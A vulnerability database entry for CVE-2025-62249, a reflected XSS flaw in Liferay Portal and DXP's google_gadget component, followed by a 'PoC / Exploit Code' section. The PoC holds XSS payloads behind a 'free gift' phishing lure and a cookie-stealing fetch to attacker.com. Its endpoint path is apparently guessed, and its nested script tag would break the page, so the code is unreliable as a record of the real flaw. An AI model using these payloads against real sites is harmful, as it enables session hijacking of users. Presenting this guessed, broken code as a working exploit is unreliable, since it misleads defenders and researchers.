Security Vulnerability Report
CVE-2025-62249 CVSS 6.1 MEDIUM

CVE-2025-62249

Published: 2025-10-21 19:21:25
Last Modified: 2025-12-12 20:39:35

Description

A reflected cross-site scripting (XSS) vulnerability in Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q3.0 through 2025.Q3.2, 2025.Q2.0 through 2025.Q2.12, 2025.Q1.0 through 2025.Q1.17, 2024.Q4.0 through 2024.Q4.7, 2024.Q3.1 through 2024.Q3.13, 2024.Q2.0 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.20, and 2023.Q4.0 through 2023.Q4.10 allows a remote, unauthenticated attacker to inject JavaScript into the google_gadget.

CVSS Details

CVSS Score (v3.1, Primary)
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSS Score (v4.0, Secondary)
6.9 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
Weakness
CWE-79 (Improper Neutralization of Input During Web Page Generation)

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE
Liferay Portal 7.4.0 - 7.4.3.132
Liferay DXP 2025.Q3.0 - 2025.Q3.2
Liferay DXP 2025.Q2.0 - 2025.Q2.12
Liferay DXP 2025.Q1.0 - 2025.Q1.17
Liferay DXP 2024.Q4.0 - 2024.Q4.7
Liferay DXP 2024.Q3.1 - 2024.Q3.13
Liferay DXP 2024.Q2.0 - 2024.Q2.13
Liferay DXP 2024.Q1.1 - 2024.Q1.20
Liferay DXP 2023.Q4.0 - 2023.Q4.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- Reflected XSS PoC for CVE-2025-62249 in Liferay Portal google_gadget -->
<!-- The vulnerability exists in the google_gadget component which fails to sanitize user input -->
<!-- Example malicious URL structure: -->
<!-- https://target-liferay.com/google_gadget/...?param=<script>alert(document.cookie)</script> -->
<!-- HTML PoC demonstrating the attack: -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-62249 - Liferay google_gadget XSS PoC</title>
</head>
<body>
  <h1>CVE-2025-62249 Reflected XSS PoC</h1>
  <p>Click the link below to trigger the reflected XSS vulnerability:</p>
  <!-- The malicious payload is injected via the google_gadget parameter -->
  <a href="https://target-liferay.com/web/google_gadget/view?url=javascript:alert('XSS-'+document.cookie)">
    Click here for a free gift!
  </a>
  <br><br>
  <!-- Alternative payload using img onerror -->
  <a href="https://target-liferay.com/web/google_gadget/view?url="><img src=x onerror=alert('XSS-CVE-2025-62249')></a>
  <script>
    // Automated exploitation example
    // The attacker can craft a URL that steals cookies and sends them to an attacker-controlled server
    function exploitXSS() {
      var payload = "<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>";
      var maliciousURL = "https://target-liferay.com/web/google_gadget/view?url=" + encodeURIComponent(payload);
      window.location = maliciousURL;
    }
  </script>
</body>
</html>
```

References

https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62249 (Vendor Advisory)